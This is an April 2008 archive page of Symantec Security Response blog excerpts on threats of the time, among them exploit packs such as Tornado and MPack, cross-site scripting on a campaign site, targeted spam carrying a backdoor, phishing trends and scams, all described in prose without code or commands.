Video Screencast Help
Scheduled Maintenance: Symantec Connect is scheduled to be down Saturday, April 19 from 10am to 2pm Pacific Standard Time (GMT: 5pm to 9pm) for server migration and upgrade.
Please accept our apologies in advance for any inconvenience this might cause.

Security Response

Showing posts for April of 2008
Showing posts in English
Liam O Murchu | 25 Apr 2008 23:25:31 GMT | 0 comments
 
 

The problem: You develop a software package that you want to sell in the underground community. However, your buyers are not the most reputable/trustworthy people. How do you prevent your product from being purchased once and then distributed freely afterwards? How do you enforce your “copyright”?

The solution: Ask the antivirus companies to help you out.

Here is a perfect example. The screen shot below is taken from a typical underground software package. Shown in the screen shot are the terms and conditions of the sale—the “licensing agreement.” Yes, that’s right; some underground packages come with a licensing agreement. The document is written in Russian, but a translation is provided below.

 

...

Liam O Murchu | 22 Apr 2008 14:24:42 GMT | 0 comments

We have recently received a new Web exploit pack called Tornado that contains exploits for 14 vulnerabilities by default. The pack also contains the usual stats and admin pages; however, the greatest success of this pack appears to be how well it has stayed under the radar.

Firstly, let’s take a look at what is in the pack. When a user logs into the Tornado administration control panel, the statistics page is shown, as presented below. This page shows how successful an exploit campaign has been to date. It shows the number of visitors to the exploit pack and how many of those visitors were successfully exploited, which includes a breakdown by OS and by browser type.

Another page shows the exploits that are available to...

Zulfikar Ramzan | 21 Apr 2008 23:53:38 GMT | 0 comments

On the eve of the much anticipated Pennsylvania Democratic Primary, we received public reports of a series of cross-site scripting vulnerabilities that affected Barack Obama's campaign Web site. We also saw reports of these vulnerabilities being disclosed publicly on the XSSed.com Web site. The corresponding code to exploit the vulnerabilities was used to redirect users to Hillary Clinton’s Web site.

Who says attackers don’t have a sense of humor? While a couple of these vulnerabilities were shored up before we could investigate them, we were able to examine some for validity.

At a high level, what appears to have happened is that an attacker took advantage of the fact that certain parts of the Obama campaign site allows users to post content, for example, in the form of community blog postings. While most users take advantage of such features to post political commentary, at least one user decided to try posting something more insidious.

Here’s how such...

Zulfikar Ramzan | 18 Apr 2008 20:15:41 GMT | 0 comments

For some time now, Symantec has stressed that the online threat landscape shifted a few years back, away from hobbyist-driven threats towards financially driven threats. This trend has given rise to a class of malicious software known as "crimeware."

I recently had the pleasure of collaborating with Markus Jakobsson on a book, "Crimeware: Understanding New Attacks and Defenses," which studies the problem and where it seems to be heading. The book is an edited volume in which we were fortunate to include contributions that were received from top experts across industry and academia all over the world.

We worked on the book to bring to light the fact that the game has changed considerably. The book covers the following topics:

- A general overview of Crimeware, including taxonomy of well known threats, such as keyloggers, screenscrapers, rootkits, botnets, and the like.
- A more detailed study of well...

khaley | 16 Apr 2008 20:00:21 GMT | 0 comments

Sometimes in this job you can be a kill joy. Take, for instance, a situation I was involved in a couple of weeks ago. I had the unpleasant task of informing someone that they were not going to be given 12 million dollars.

I had been invited on the morning show at KSON-FM in San Diego. One of the DJs had received an email he wanted to ask me about. I assumed it was a phishing attack, or perhaps the recent IRS scam that Kelly Conley has blogged about. It turned out he had received an email telling him he was going to be given 12 million dollars. I had to ruin his day. He was not going to be rich, and if he wasn’t careful he might become a victim of the old Spanish Prisoner scam.

This con has been around since the 16th century. 500 years ago you would have received a letter from a man held in a Spanish prison. The...

Shunichi Imano | 14 Apr 2008 22:16:03 GMT | 0 comments
Today, April 14th, 2008, Symantec Security Response received reports from a number of our customers regarding a possible targeted spam attack against several Japanese companies.

The spam email associated with this attack spoofs itself as an email from a Japanese government agency and entices the user to open the attached .zip file to check recent organizational changes. The attached .zip file contains 2 files: 0414.xls and 0414.exe. 0414.xls is a legitimate file containing a list of names, addresses, and personnel positions that may or may not really exist. There is no evidence to suggest that any exploit attempts are made on this file.

However, the other file, 0414.exe, is a variant of Backdoor.Darkmoon, which has a keylogging capabilities. At the time of writing, we have seen several variants of...

Andrea DelMiglio | 11 Apr 2008 17:58:55 GMT | 0 comments

Symantec has been notified that the Web site ladestra.info, a site related to a right-wing Italian political party, has been compromised. The Web site is hosting a malicious iframe that leads to a typical browser exploit using the Neosploit tool, which forces an infected computer to install the newest version of Trojan.Mebroot.

Using elections as a channel for spreading malicious code is something we have already seen (for example,...

Joseph Blackbird | 11 Apr 2008 17:53:05 GMT | 0 comments

Phishing is an attempt by a third party to solicit confidential information from an individual, group, or organization by mimicking (spoofing) a specific, usually well known brand, usually for financial gain. Phishers attempt to trick users into disclosing personal data, such as credit card numbers, online banking credentials, and other sensitive information, which they may then use to commit fraudulent acts.

 

During the second half of 2007, the majority of brands targeted by phishing attacks were in the financial services sector, accounting for 80 percent. This is virtually unchanged from the 79 percent reported in the first half of 2007. The financial services sector also accounted for the highest volume of phishing Web sites during this period, at 66 percent, down slightly from 72 percent in the first half of 2007. Since most phishing activity pursues financial gain, successful attacks using brands in this sector are most likely to yield profitable data, such...

Sean Hittel | 10 Apr 2008 22:22:40 GMT | 0 comments

It has been less than two days since Microsoft announced a couple of vulnerabilities in graphics device interface (GDI) EMF formatted images, but our DeepSight honeypots are already showing some signs of exploitation in the wild. Although the exploits that we have seen so far do not yet appear to be functional, they appear to have the right general idea in their exploitation. It is possible that these exploits either have been leaked and are "in-work" copies, or that they are functional on some platform that we have not tested.

However, the exploit (named "top.jpg") does contain functional payload, which downloads a secondary file (word.gif). Word.gif is really an executable that would be run following a successful infection. Its main function would be to use iexplore.exe to contact a few hosts in China, presumably to download additional malicious code.

The exploit image is detected by Symantec IPS-enabled products as...

Marc Fossi | 10 Apr 2008 22:17:28 GMT | 0 comments

In late May 2007, the MPack attack kit was first observed in the wild. This kit relied on compromised Web pages to redirect users to an MPack server that attempted to exploit Web browser and plug-in vulnerabilities in order to install malicious code on computers. MPack experienced great success because it took advantage of the trust many users place in certain Web sites. Since the Web browser is the primary gateway to the Internet for most users, Web pages that they visit frequently—such as online forums and other Internet communities—are a useful means of compromising computers for attackers.

Because of the success of kits like MPack and Ice-Pack, it seems that malicious code authors have begun to incorporate similar features in the threats they create. In the current period, seven percent of the volume of the top 50 malicious code samples...